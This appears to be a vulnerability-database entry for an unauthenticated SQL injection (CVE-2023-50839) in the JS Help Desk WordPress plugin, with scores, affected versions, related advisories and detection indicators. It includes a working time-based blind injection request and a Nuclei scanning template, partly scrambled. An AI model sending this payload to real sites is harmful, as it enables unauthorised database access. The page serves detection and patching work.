CVE-2023-50839
published 2023-12-28CVE-2023-50839: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support…
PriorityP264critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.04%
78.7th percentile
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rabilal | js_help_desk_ai-powered_support_ticketing_system | <= 2.8.2 | — |
| wiselyhub | js_help_desk | <= 2.8.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/js-support-ticket-controlpanel/
commandform_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-
- →Exploit targets the `ticketid` POST parameter with a time-based blind SQL injection payload using SLEEP(8); detect POST requests to /js-support-ticket-controlpanel/ with SQL keywords (SELECT, SLEEP, AND) in the body.
- →Successful exploitation results in an HTTP 302 redirect with an empty body and Content-Type text/html; a response duration >= 8 seconds indicates the SLEEP payload fired.
- →The request uses Content-Type application/x-www-form-urlencoded and includes the fixed form fields form_request=jssupportticket, jstmod=ticket, task=showticketstatus; monitor for these in POST bodies to the plugin endpoint.
- ·Vulnerability affects JS Help Desk plugin versions up to and including 2.8.1; versions beyond this range are not confirmed affected. ↗
- ·The PoC uses a time-based blind SQLi with an 8-second sleep threshold; adjust detection thresholds accordingly to avoid false positives from slow networks.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q6hf-vhcp-h7c7: The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the 'js-support-ticket-token-tkstatus
ghsa_unreviewed·2026-03-04·CVSS 9.3
CVE-2023-7337 [CRITICAL] CWE-89 GHSA-q6hf-vhcp-h7c7: The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the 'js-support-ticket-token-tkstatus
The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection via the 'js-support-ticket-token-tkstatus' cookie in version 2.8.2 due to an incomplete fix for CVE-2023-50839 where a second sink was left with insufficient escaping on the user supplied values and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
GHSA
GHSA-3f5j-mfg2-hxvj: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Sup
ghsa_unreviewed·2023-12-28
CVE-2023-50839 [CRITICAL] CWE-89 GHSA-3f5j-mfg2-hxvj: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Sup
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1.
No detection rules found.
Nuclei
JS Help Desk <= 2.8.1 - SQL Injection
nuclei·CVSS 9.8
CVE-2023-50839 [CRITICAL] JS Help Desk <= 2.8.1 - SQL Injection
JS Help Desk = 8'
- 'status_code == 302'
- 'len(body) == 0'
- 'contains(content_type, "text/html")'
condition: and
- raw:
- |
@timeout: 20s
POST /js-support-ticket-controlpanel/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
form_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 302'
- 'len(body) == 0'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4b0a00483046022100ce8627faf109be6cac2757e5b6d6691507886901b533437a46cb2edd4ec22f94022100cbfaf7c966cfb86f46966f8ac9fed3f3fe35e381358015ef1a90cca2edbd19b0:922c64590222798bb761d5b6d
https://patchstack.com/database/vulnerability/js-support-ticket/wordpress-js-help-desk-plugin-2-8-1-unauthenticated-sql-injection-vulnerability?_s_id=cvehttps://patchstack.com/database/vulnerability/js-support-ticket/wordpress-js-help-desk-plugin-2-8-1-unauthenticated-sql-injection-vulnerability?_s_id=cve
2023-12-28
Published